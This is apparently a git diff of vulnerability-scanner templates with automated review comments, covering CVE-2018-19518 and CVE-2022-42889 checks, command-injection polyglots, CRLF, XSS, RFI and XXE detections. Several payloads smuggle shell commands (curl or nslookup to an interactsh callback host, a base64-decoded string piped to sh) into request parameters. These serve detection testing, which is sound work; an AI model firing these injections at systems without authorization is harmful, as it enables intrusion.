diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index dcce6456e0..86b34c9f6f 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -28,15 +28,21 @@ http: payloads: php-imap: - - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" + - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}" fuzzing: - part: query fuzz: - "{{php-imap}}" + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol words: - - "dns" + - http + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 5b9328d136..db654fe169 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -64,3 +64,4 @@ http: part: interactsh_request group: 1 regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index 1a40b9fe6e..1375e5dc86 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -22,7 +22,7 @@ http: - 'method == "GET"' payloads: - interaction: + payload: - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" @@ -32,7 +32,7 @@ http: - part: query type: postfix fuzz: - - "{{interaction}}" + - "{{payload}}" stop-at-first-match: true matchers: 
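Review bot: The new `interactsh_request` matcher only fires when the callback actually reaches the server over HTTP, so a host where outbound HTTP is egress-filtered (or `curl` is not installed) but DNS resolution still leaks now yields no finding, which the removed `nslookup`/`"dns"` check used to catch; this trades false positives for false negatives, and the rationale (presumably to reduce DNS-only false positives — confirm) should be recorded where the `# Confirms the DNS Interaction` comment was dropped, e.g. `part: interactsh_protocol  # HTTP callback + curl UA required; DNS-only hits are ignored`. The added word `- http` is unquoted while the value it replaces was `"dns"`; quote it as `- "http"` for consistency with the rest of the file. The file also loses its trailing newline (`\ No newline at end of file`), which yamllint flags.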
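Review bot: The first capture group of the added regex, `[a-zA-Z0-9\.\-]+`, includes the dot, so with `group: 1` it greedily absorbs every leading label and the extracted value is whatever precedes the last four labels rather than a single hostname label; dropping the dot from that class, `'([a-zA-Z0-9\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`, pins group 1 to one label. The pattern also requires at least five dot-separated labels, which presumably assumes a prefix plus the interactsh domain; if the callback hostname has fewer labels the extractor silently yields nothing, so verify it against a real interaction. The extractor's `type`/`name` lines and the enclosing matchers block begin outside the hunk.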
diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 895e06c9d0..3ca54a7502 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -11,6 +11,7 @@ http: - type: dsl dsl: - 'method == "GET"' + payloads: escape: - "%00" diff --git a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml index 6e666f4aa4..adb6d2d1c2 100644 --- a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml +++ b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml @@ -4,10 +4,16 @@ info: name: Angular Client-side-template-injection author: theamanrawat severity: high + description: | + Detects Angular client-side template injection vulnerability. + impact: | + May lead to remote code execution or sensitive data exposure. + remediation: | + Sanitize user inputs and avoid using user-controlled data in template rendering. reference: - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs - tags: angular,csti,dast + tags: angular,csti,dast,headless,xss variables: first: "{{rand_int(1000, 9999)}}" @@ -19,6 +25,7 @@ headless: - action: navigate args: url: "{{BaseURL}}" + - action: waitload payloads: diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index 08fbc0f67d..c2d11ba59a 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -1,7 +1,7 @@ id: lfi-keyed info: - name: Key LFI Detection + name: LFI Detection - Keyed author: pwnhxl severity: unknown reference: 
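Review bot: The added `remediation` text is generic ("Sanitize user inputs…") and says nothing specific to AngularJS template injection, where HTML-encoding alone does not help because the framework evaluates `{{ }}` expressions in plain text; a more useful line is `Do not reflect untrusted input inside AngularJS-bound markup; wrap such content in ng-non-bindable or render it outside the ng-app scope, and keep AngularJS current.`. The `description`/`impact`/`remediation` blocks use `|`, which keeps a trailing newline in each value; that matches the dom-xss template in this same diff, so it is acceptable as a file convention. The enclosing `info:` key starts before the hunk, and the `waitload` step is added in this file's second hunk.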
diff --git a/dast/vulnerabilities/rfi/rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml similarity index 91% rename from dast/vulnerabilities/rfi/rfi.yaml rename to dast/vulnerabilities/rfi/generic-rfi.yaml index 1758a72019..559895a10b 100644 --- a/dast/vulnerabilities/rfi/rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -1,7 +1,7 @@ -id: rfi +id: generic-rfi info: - name: Remote File Inclusion + name: Generic Remote File Inclusion author: m4lwhere severity: high reference: diff --git a/dast/vulnerabilities/xss/dom-xss.yaml b/dast/vulnerabilities/xss/dom-xss.yaml index f01edc6c14..a8e8581203 100644 --- a/dast/vulnerabilities/xss/dom-xss.yaml +++ b/dast/vulnerabilities/xss/dom-xss.yaml @@ -4,18 +4,22 @@ info: name: DOM Cross Site Scripting author: theamanrawat severity: medium - tags: xss,dom,dast - + description: | + Detects DOM-based Cross Site Scripting (XSS) vulnerabilities. + impact: | + Allows attackers to execute malicious scripts in the victim's browser. + remediation: | + Sanitize and validate user input to prevent script injection. + tags: xss,dom,dast,headless variables: num: "{{rand_int(10000, 99999)}}" - headless: - steps: - action: navigate args: url: "{{BaseURL}}" - - action: waitload + - action: waitload payloads: reflection: - "'\">

{{num}}

" @@ -38,8 +42,4 @@ headless: - type: word part: header words: - - "text/html" - - - type: status - status: - - 200 + - "text/html" \ No newline at end of file diff --git a/dast/vulnerabilities/xxe/fuzz-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml similarity index 91% rename from dast/vulnerabilities/xxe/fuzz-xxe.yaml rename to dast/vulnerabilities/xxe/generic-xxe.yaml index 4c36275a40..afe2ae75f2 100644 --- a/dast/vulnerabilities/xxe/fuzz-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -1,7 +1,7 @@ -id: fuzz-xxe +id: generic-xxe info: - name: XXE Fuzzing + name: Generic XML external entity (XXE) author: pwnhxl severity: medium reference:
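Review bot: Dropping the `type: status` / `200` matcher means the remaining `text/html` header check accepts any response code; for DOM-based XSS that is defensible, since the sink runs client-side regardless of status, but the `matchers-condition` and any reflection matcher that would confine this sit outside the hunk, so whether `text/html` is now ANDed with a reflection check or is sufficient on its own cannot be verified here. If the status check was removed on purpose, record it beside the header matcher, e.g. `# any status: the DOM sink fires client-side`. The rewritten last line also leaves the file without a trailing newline (`\ No newline at end of file`), as does CVE-2018-19518.yaml in this diff; yamllint's new-line-at-end-of-file rule flags both.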